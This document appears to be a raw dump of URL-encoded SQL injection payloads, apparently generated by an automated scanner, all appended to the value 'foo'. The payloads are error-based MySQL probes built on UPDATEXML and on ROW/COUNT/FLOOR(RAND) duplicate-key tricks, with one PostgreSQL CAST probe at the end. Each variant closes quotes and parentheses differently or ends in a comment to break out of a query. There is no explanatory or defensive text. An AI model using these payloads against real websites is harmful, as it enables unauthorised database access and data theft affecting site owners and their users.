foo%27%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%27Ciec%27%20LIKE%20%27Ciec foo%27%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%28%27uuDl%27%20LIKE%20%27uuDl foo%27%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%27JtMo%27%20LIKE%20%27JtMo foo%22%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%22GNMR%22%3D%22GNMR foo%22%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%22MGnu%22%3D%22MGnu foo%22%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%28%22rpkJ%22%3D%22rpkJ foo%22%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%22iPon%22%3D%22iPon foo%22%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%22xQFn%22%20LIKE%20%22xQFn foo%22%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%22HVqO%22%20LIKE%20%22HVqO foo%22%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%28%22aHiR%22%20LIKE%20%22aHiR foo%22%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%22VPOl%22%20LIKE%20%22VPOl foo%25%27%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%28%27fJuK%27%3D%27fJuK foo%00%27%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20AND%20%27vINd%27%3D%27vINd foo%27%29%20WHERE%202839%3D2839%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%22%29%20WHERE%207633%3D7633%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%29%20WHERE%204503%3D4503%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%27%20WHERE%205093%3D5093%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%22%20WHERE%204835%3D4835%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%20WHERE%201541%3D1541%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20--%20 foo%27%7C%7C%28SELECT%20%27nnMQ%27%20FROM%20DUAL%20WHERE%205576%3D5576%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27OjWp%27%20WHERE%202016%3D2016%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20zSmb%20WHERE%208895%3D8895%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20%29%2B%27 foo%27%2B%28SELECT%20%27gzwr%27%20WHERE%202925%3D2925%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%282424%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%282424%3D2424%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C8254%29%20%23 foo%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29 foo%27%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29 foo%27%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29 foo%22%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29 foo%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%283986%3D3986 foo%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%282541%3D2541 foo%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%289779%3D9779 foo%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29 foo%27%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%27CYya%27%3D%27CYya foo%27%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27lEeu%27%3D%27lEeu foo%27%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27OuvB%27%3D%27OuvB foo%27%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%27Esje%27%3D%27Esje foo%27%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%27gwnP%27%20LIKE%20%27gwnP foo%27%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27VMWn%27%20LIKE%20%27VMWn foo%27%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27ahsD%27%20LIKE%20%27ahsD foo%27%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%27cTnS%27%20LIKE%20%27cTnS foo%22%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%22xukk%22%3D%22xukk foo%22%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22vSgj%22%3D%22vSgj foo%22%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22ynkx%22%3D%22ynkx foo%22%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%22xYqd%22%3D%22xYqd foo%22%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%22MtQp%22%20LIKE%20%22MtQp foo%22%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22xItx%22%20LIKE%20%22xItx foo%22%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22vCfU%22%20LIKE%20%22vCfU foo%22%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%22bSqp%22%20LIKE%20%22bSqp foo%25%27%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%28%27DmvM%27%3D%27DmvM foo%00%27%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20AND%20%27jtzH%27%3D%27jtzH foo%27%29%20WHERE%202478%3D2478%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%22%29%20WHERE%207495%3D7495%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%29%20WHERE%201683%3D1683%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%27%20WHERE%207825%3D7825%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%22%20WHERE%201207%3D1207%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%20WHERE%203538%3D3538%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20--%20 foo%27%7C%7C%28SELECT%20%27EVIk%27%20FROM%20DUAL%20WHERE%209254%3D9254%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27BGis%27%20WHERE%206793%3D6793%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20dyTj%20WHERE%205190%3D5190%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20%29%2B%27 foo%27%2B%28SELECT%20%27mcLL%27%20WHERE%203086%3D3086%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%289071%2C8982%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%289071%3D9071%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207668%20UNION%20SELECT%208642%20UNION%20SELECT%201374%20UNION%20SELECT%201205%29a%20GROUP%20BY%20x%29%20%23 foo%29%20AND%203948%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283948%3D3948%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 